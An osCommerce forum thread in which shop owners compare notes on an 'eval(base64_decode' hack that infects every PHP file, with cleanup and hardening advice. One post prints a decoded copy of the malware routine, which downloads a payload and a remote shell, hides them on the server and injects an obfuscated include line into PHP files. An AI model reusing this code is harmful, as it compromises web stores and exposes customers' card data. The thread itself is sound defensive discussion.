Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

eval(base64_decode Hack


FIMBLE

Recommended Posts

Hi All,

 

Looks like i too was a victim of this hack... now I have restored a backup from before the hack took place, but now i cannot access the admin panel... i put it in the browser and all it shows is a blank page on Firefox... anyone have any ideas?

 

All the files are in there... i have even tried using the standard install files... nothing :(

 

HI James,

Its probably an error, look in your error logs from your server for clues, alternatively add this code to your admin/ login.php (if 2.2RC2A) or admin index.php (if 2.2MS) at the top of the file and within <?php tags

 

ini_set('display_errors',1); 
error_reporting(E_ALL);

 

I would imagine you have a headers already sent error

 

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

  • 2 weeks later...
  • Replies 125
  • Created
  • Last Reply

Joining the club - Hacked - and my team lost again today.

 

 

Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?

 

Obviously the authors "like" OsCommerce.

 

 

Yes!!! they can get into WordPress, at least v2.8.4... (wondering if that's why 2.8.5 and 2.8.6 came out so quickly afterwards??) Anyway, had my client's OSC site AND WP site hacked same day. Seems the bad file (in the Base64 decode) was located here:

wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php

 

So, now I'm spending my evening restoring things and hoping to make things more secure! UGH.

Link to comment
Share on other sites

  • 2 weeks later...

I just found another

 

main.inc.php

The Site can be viewed at www.performanceautopartsonline.com

 

The site is live (despite these minor glitches) please respect that and do not sign up etc...

 

maybe a contribution one day when I get this site the way I want it.

 

I don't make spelling mistakes! I have dyslecsic fingers.

Link to comment
Share on other sites

There are more popping up all the while.

d3fault.php

main_language.php

english_main.php

i just removed from someone's site.

This time the hack was placed in only files relevant to the checkout process and copied all the clients details including the credit card numbers and mailed it to the .... nice!

nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

  • 1 month later...
  • 1 month later...

Hello,

 

I have had this hack before, and am a little wiser to the trouble it causes when you havent backed up recently,

 

Guess what, I dont have a recent enough backup this time either, Bummer!

 

But I have caught the detials of the the attacker in my last visitor logs, this should help developers/osc users and clarifies where the hackers got in:

 

SORRY DIDNT WORK

Link to comment
Share on other sites

http://addons.oscommerce.com/info/3220 ## POINTS AND REWARDS MODULE V1.00 ##

 

This add-on seems to have the attack located in installer.php so beware.

 

Good thing I read this forum before I became a victim! Thanks!

 

 

I would like verification that it is an attack before I post on the contribution page; I am not skilled enough to decode it fully.

Link to comment
Share on other sites

http://addons.oscommerce.com/info/3220 ## POINTS AND REWARDS MODULE V1.00 ##

 

This add-on seems to have the attack located in installer.php so beware.

 

Good thing I read this forum before I became a victim! Thanks!

 

 

I would like verification that it is an attack before I post on the contribution page; I am not skilled enough to decode it fully.

It is not an attack but it contains highly obfuscated code that from the decoding attempts I did shows it wants to include code from a geocities website in Japan that is actually a nice install script (with bugs though). Since I got a warning URL file-access is disabled in the server configuration I don't think this installer.php will be very helpful to a lot of people.

 

For the time being I disabled the upload of October 4, 2008 that contains this particular installer.php in the root directory and added a warning to the description of the contribution plus the upload of October 8, 2008 to use the installer.php in the directory sql_files. It gives a php header error on both the install and the uninstall for me but it does work.

Link to comment
Share on other sites

Here's one more.

And forex is all over the strange files.

 

Starting to reinstall everything. I hope oscommerce have improved security issues.

"The Breath becomes a stone; the stone, a plant; the plant, an animal; the animal, a man; the man, a spirit; and the spirit, a God."

Link to comment
Share on other sites

My site was hacked, too. My hosting site ran a script to remove the long code. Just wondering a couple dumb questions here: 1. Does it matter if the initial coding on each file is <?php/**/?> instead of <?php/* - or exactly what should it be? 2. There's a "sedNXuf28" type document in admin/includes. I've never seen that before. Should I delete it? I have a feeling I will need to redo my entire site. Thanks!

Link to comment
Share on other sites

I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver.

No outside links in signature allowed. See forum rules please.

Link to comment
Share on other sites

I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver.

 

 

I`m not sure dreamweaver is the best choice for editing php files.

 

If you follow the links in the OP including http://www.oscommerce.com/forums/index.php?showtopic=344272 you will find on that thread mention of a util to search all your files for the code.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

  • 3 weeks later...

eval(base64_decode hack going around the internet,

 

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.

Some of the more common signs of this are

* Category images stop displaying

* FCK editor refuses to display images folder

* Payment modules stop working

* Checkout process stops working

 

How will you know?

Open any PHP file on your server, if at the very top you see a line like

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)

Then you have been hacked.

 

To clean your site you have two options,

1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)

And restore from a good back up. This is the best and easy route.

 

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

 

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

 

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

 

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

 

Now your site is free on the code, you need to prevent it from happening again.

 

How to prevent infection.

 

This is not guaranteed 100% proof but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755

Install some security addons,

Also some ideas from this post can help you,

If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.

There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.

 

I have just tried to use the Decoder that is recommended, but keep getting this error:

 

Invalid character in a Base-64 string

 

Do I need to change what I put into it?

Link to comment
Share on other sites

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.

You really need to decode the line to find the place that the files are located in.

There can be a lot of files or one or two, and called different names.

style.css.php is one

dg.php another

there are .swf files also

 

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end

Nic

 

I have a bit of confusion with how to get the decoder to work. This is the start:

 

<?php eval(gzinflate(base64_decode('FZnHDqvIFkU/p2+LATmpR2RMzhgmT+ScM1//

 

...and the end:

 

/8++///73fw==')));?>

 

When trying to take off the <?php and the ?> I keep gettig this error: Invalid length for a Base-64 char array.

Link to comment
Share on other sites

Nick,

 

Do not include this from the beginning:

 

eval(gzinflate(base64_decode('

 

OR this at the end"

 

'))); ?>

 

 

so everything between the opening ' and ending ' ONLY

 

 

 

Chris

Link to comment
Share on other sites

Nick,

 

Do not include this from the beginning:

 

eval(gzinflate(base64_decode('

 

OR this at the end"

 

'))); ?>

 

 

so everything between the opening ' and ending ' ONLY

 

 

 

Chris

 

Thanks Chris. I now get this message though:

 

Invalid character in a Base-64 string.

Link to comment
Share on other sites

Nick,

 

Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well.

 

If you want to post the encoded code I will try to decode it for you.

 

 

 

Chris

Link to comment
Share on other sites

It would be a heck of a lot easier to restore a clean backup of your site than to try to clean all the files, and how would you know if you really did remove all the malicious code?

 

I think the only way you could not have a backup is if 1. You're hosting the site yourself, and 2. You modify files directly on the live site. Obviously there's some problems with both of those if you don't know what you're doing.

Link to comment
Share on other sites

Nick,

 

Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well.

 

If you want to post the encoded code I will try to decode it for you.

 

 

 

Chris

 

Hi, it's strange because I have used it previously and got it to work, but it's wierd this time. I will PM it to you.

 

Thanks.

Link to comment
Share on other sites

Nick,

 

This is the decoded file:

 

function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }

 

 

 

Chris

Link to comment
Share on other sites

Nick,

 

This is the decoded file:

 

function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }

 

 

 

Chris

 

Cheers Chris. How do I find out what file the hack is in?

Link to comment
Share on other sites

Hi Nick,

 

I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files:

 

catalog/admin/file_manager.php

catalog/admin/login.php

catalog/includes/application_top.php

 

 

I suggest you read these:

 

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

http://www.oscommerce.com/forums/index.php?showtopic=340995

 

Chris

Link to comment
Share on other sites

Hi Nick,

 

I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files:

 

catalog/admin/file_manager.php

catalog/admin/login.php

catalog/includes/application_top.php

 

 

I suggest you read these:

 

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

http://www.oscommerce.com/forums/index.php?showtopic=340995

 

Chris

 

Hey Chris,

 

I have removed file manager, but I guess they must have slipped in before hand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my file like I have had happen before. I will check those other files though. Thanks.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...